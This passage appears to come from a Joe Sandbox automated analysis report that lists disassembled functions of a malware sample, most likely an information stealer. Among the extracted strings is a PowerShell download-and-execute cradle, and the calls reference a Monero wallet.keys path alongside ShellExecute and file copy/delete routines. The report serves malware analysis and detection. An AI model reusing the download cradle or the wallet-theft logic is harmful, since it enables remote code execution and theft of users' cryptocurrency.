                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: c77790c32f9c1ac1ca67b58ff595879d925192a10a68468882be79c996240f88
                              • Instruction ID: 5a21a391c4ef1ed7abf5142bb956bdf0de7c84a6cd702bcb9e4eddea689dad26
                              • Opcode Fuzzy Hash: c77790c32f9c1ac1ca67b58ff595879d925192a10a68468882be79c996240f88
                              • Instruction Fuzzy Hash: E941E171D10208EADB55FFA0C899BEEB7B4AF51300F404269F006A7192DF7C6A4ACF91
                              Function 00799E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                              Download Yara Rule
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00799F41
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 621be8d275c8f96c6b2402acddfbfa4461fde47648222cea48ebdea0b6655b34
                              • Instruction ID: 9410a54fa3f78cfeeba8c328d0ff160dc707e2b8c8b622e37bbf2d92ea63eb99
                              • Opcode Fuzzy Hash: 621be8d275c8f96c6b2402acddfbfa4461fde47648222cea48ebdea0b6655b34
                              • Instruction Fuzzy Hash: A3611171A10248EFDF14EFA4DC99FEE7775AF85300F408518F90A5B191EB786A05CB92
                              Function 007A40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,014CD7E0,00000000,00020119,?), ref: 007A40F4
                              • RegQueryValueExA.ADVAPI32(?,014CE190,00000000,00000000,00000000,000000FF), ref: 007A4118
                              • RegCloseKey.ADVAPI32(?), ref: 007A4122
                              • lstrcat.KERNEL32(?,00000000), ref: 007A4147
                              • lstrcat.KERNEL32(?,014CE2E0), ref: 007A415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: 347a013a47c12eb558fbc4e003b38387d58bb4973ebfe4ddb72a45ad8e475596
                              • Instruction ID: a6008b31c61ea1da5d2fda1100b84e128365f923a38f169de73b93f045046a86
                              • Opcode Fuzzy Hash: 347a013a47c12eb558fbc4e003b38387d58bb4973ebfe4ddb72a45ad8e475596
                              • Instruction Fuzzy Hash: 4241B8B6D50108ABDB14EBA0EC4AFFE733DAB88300F404559B61557181EA795BD88BD2
                              Function 007A7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007A7E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A7E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,014BC380,00000000,00020119,?), ref: 007A7E5E
                              • RegQueryValueExA.ADVAPI32(?,014CD700,00000000,00000000,000000FF,000000FF), ref: 007A7E7F
                              • RegCloseKey.ADVAPI32(?), ref: 007A7E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 356896f93b6580735b45af5daed8e8bac72e05fb209a1f82b6025f1f32bfcbae
                              • Instruction ID: f4c7a3354ffd2bb8901204f95fefe08807a3276adf2aa2eb1d7cc2d77fd7f726
                              • Opcode Fuzzy Hash: 356896f93b6580735b45af5daed8e8bac72e05fb209a1f82b6025f1f32bfcbae
                              • Instruction Fuzzy Hash: 39119EB1A88205EBD704CF94DD49FBBBBB8EB44B00F10425AFA05A7280D7785800DBA1
                              Function 007A9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrStrA.SHLWAPI(014CE0B8,?,?,?,007A140C,?,014CE0B8,00000000), ref: 007A926C
                              • lstrcpyn.KERNEL32(009DAB88,014CE0B8,014CE0B8,?,007A140C,?,014CE0B8), ref: 007A9290
                              • lstrlen.KERNEL32(?,?,007A140C,?,014CE0B8), ref: 007A92A7
                              • wsprintfA.USER32 ref: 007A92C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: e32ea771ca4952235691b5cc87123d323c4819853b8c78710834ce704593ded7
                              • Instruction ID: 9e7a989dfe797bd26e89dac036d4106e8db1d6eb57979b68b22c2a048a472a03
                              • Opcode Fuzzy Hash: e32ea771ca4952235691b5cc87123d323c4819853b8c78710834ce704593ded7
                              • Instruction Fuzzy Hash: 09011A75545208FFCB04DFECC988EAE7BB9FB48364F108149F9098B340C635AAA1DB91
                              Function 007912A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007912B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007912BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007912D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007912F5
                              • RegCloseKey.ADVAPI32(?), ref: 007912FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: ec8459240ae93a5996f251a2450dd3878676fb011829f93ce630d4f47de71091
                              • Instruction ID: b96c09796556f9153be6142e02512038bd63584b5b35065bcb6d644890cbc6ea
                              • Opcode Fuzzy Hash: ec8459240ae93a5996f251a2450dd3878676fb011829f93ce630d4f47de71091
                              • Instruction Fuzzy Hash: 180131B9A54208BBDB00DFE0DC49FAEB7B8EB48701F00815AFE0597280D6749A519F51
                              Function 007AC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: e7e1cf31f8d41aa7208df1b6939c9acf8345c8bae5190dcb4f4bd25f051ce964
                              • Instruction ID: 03d7c1127830e1813fb250e4b21b40613094831704e9b1d2f937c2a65b85da12
                              • Opcode Fuzzy Hash: e7e1cf31f8d41aa7208df1b6939c9acf8345c8bae5190dcb4f4bd25f051ce964
                              • Instruction Fuzzy Hash: 9A410C7110075CAEDB368B24CC85FFB7BEC9F86704F1445E8D58686182D279AA44CF60
                              Function 007A6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 007A6663
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 007A6726
                              • ExitProcess.KERNEL32 ref: 007A6755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: bb131e5bd9a4f72613a3a3725ab12cedcec1415e900fce84cca40362d7615716
                              • Instruction ID: 7537062153cd47fb74e38d7d52519dec6c575cdd2d3189cccdcd3fb030c506cc
                              • Opcode Fuzzy Hash: bb131e5bd9a4f72613a3a3725ab12cedcec1415e900fce84cca40362d7615716
                              • Instruction Fuzzy Hash: C4314DB1C11208EBDB54EB90DC85BDE777CAF84300F404299F20966191DF786B88CF56
                              Function 007A87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,007B0E28,00000000,?), ref: 007A882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A8836
                              • wsprintfA.USER32 ref: 007A8850
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 05ea7e80b9c572422fec64e892c0ca7a91faf904b14e790c0598bf1571a2c49a
                              • Instruction ID: 341bc4113154016da1ec7d1aea4750ee317dae9c9162d226d4ad0a5426ccafe2
                              • Opcode Fuzzy Hash: 05ea7e80b9c572422fec64e892c0ca7a91faf904b14e790c0598bf1571a2c49a
                              • Instruction Fuzzy Hash: 3E2160B1A55204EFDB00DF94DD49FAEBBB8FB48701F104119FA05A7280C7799900DBA1
                              Function 007A8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,007A951E,00000000), ref: 007A8D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A8D62
                              • wsprintfW.USER32 ref: 007A8D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 475dbfe5179fc722e7dc1b4e3cc5f8ce039355032e2173451cf9feb6d29312b1
                              • Instruction ID: 66b5bd3b26fcdd7b9cb500e06fad6f05f93599cae1c7dcabea70c16329fd07f7
                              • Opcode Fuzzy Hash: 475dbfe5179fc722e7dc1b4e3cc5f8ce039355032e2173451cf9feb6d29312b1
                              • Instruction Fuzzy Hash: F1E0C2B0A95208FFC700DFD4DC0AE6D77BCEB44702F000095FD0987280DA759E60AB92
                              Function 0079A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007A8B60: GetSystemTime.KERNEL32(007B0E1A,014CA850,007B05AE,?,?,007913F9,?,0000001A,007B0E1A,00000000,?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007A8B86
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0079A2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 0079A3FF
                              • lstrlen.KERNEL32(00000000), ref: 0079A6BC
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 0079A743
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
